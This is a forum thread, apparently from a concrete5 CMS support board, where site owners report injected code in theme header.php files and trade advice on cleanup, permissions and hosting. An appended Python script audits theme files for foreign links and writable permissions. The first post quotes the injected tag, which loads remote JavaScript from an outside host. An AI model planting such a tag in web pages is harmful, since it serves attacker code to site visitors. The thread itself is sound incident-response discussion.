elements/header.php hacked

Hi!

A couple of my sites have been hacked.
Just before closing the head-section in /themes/themename/elements/header.php, there's a new JavaScript source injected, which I haven't put there!!!

<script type="text/javascript" src="http://siu.edu.bd/includes/framework.js"></script></head>


Sites where I've named it head.php instead of header.php are OK.
How should we chmod protect our theme files, without breaking the theme?

Best wishes,
Nick

nickratering
 
rainmaker replied:
Hello!

I would remove the script for starters. If you want to change the Header, just copy the header.php, rename it to head.php and then change all the page types.
juliandale replied:
Are any other sites hosted under the same hosting account? The only time I have had a C5 site 'hacked' was because it was an addon/subdomain of a hosting account that had another site (not mine) running an old version of Joomla.

If you update your hosting password, update your C5 password/s and the site gets hacked again, then you'll probably find your host has a vulnerable site hosted on it.
nickratering replied:
Thank you for your answers!
The sites are not on the same account, but they are on the same hosting company! I've informed them.
I'll update all passwords and CHMOD config files to 600.
heathersh replied:
I had this happen to me as well over the last couple of days. All files labeled header.php and header_newsflow.php and it keeps coming back after I delete it. It's happening across over a dozen sites, all with the same hosting company but different login details. Is it possible that there is a new vulnerability being exploited in C5? I've spoken with the hosting company and they're not finding any obvious vulnerability on their side. All sites are on the latest version of concrete5 (5.6.2.1).

Also, as an update, only my concrete5 header files are hacked. And it's any concrete5 file that contains the text "header" in it. The WordPress files that are on the same host are not experiencing the "header" hack. The code being inserted is plain links, nothing special - linking to cheap cialis, etc.
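
Added example, not written by any poster in this thread: a small Python audit for the symptoms reported above. It walks a site tree, looks at PHP files with "header" in the name, lists `<script src>` and `<a href>` URLs pointing at hosts outside your own allowlist, and flags files that are group- or world-writable. The function names, the allowlist and the `name_filter` parameter are assumptions made for this example.

```python
import os
import re
import stat
from urllib.parse import urlparse

# src= on <script> and href= on <a>: the thread reports injected script
# tags as well as injected plain links.
TAG_URL = re.compile(
    r'<(script|a)\b[^>]*?\b(?:src|href)\s*=\s*["\']([^"\']+)["\']',
    re.IGNORECASE,
)

def external_refs(source, allowed_hosts):
    """Return (tag, url) pairs whose host is not in allowed_hosts."""
    hits = []
    for tag, url in TAG_URL.findall(source):
        try:
            host = urlparse(url).hostname  # None for relative or PHP-built URLs
        except ValueError:
            host = None
        if host and host.lower() not in allowed_hosts:
            hits.append((tag.lower(), url))
    return hits

def audit_theme_tree(root, allowed_hosts, name_filter="header"):
    """Audit *.php files whose name contains name_filter ("" = all PHP files)."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            low = name.lower()
            if name_filter not in low or not low.endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                refs = external_refs(fh.read(), allowed_hosts)
            mode = stat.S_IMODE(os.stat(path).st_mode)
            loose = bool(mode & (stat.S_IWGRP | stat.S_IWOTH))
            if refs or loose:
                report[path] = {"refs": refs, "mode": oct(mode), "loose": loose}
    return report

if __name__ == "__main__":
    import sys
    # Usage: python audit.py /path/to/site your-own-domain.example ...
    found = audit_theme_tree(sys.argv[1], set(sys.argv[2:]))
    for path, info in found.items():
        print(path, info)
```

Running it from cron and comparing the output between runs shows when an injection comes back after cleanup, as described in the last post.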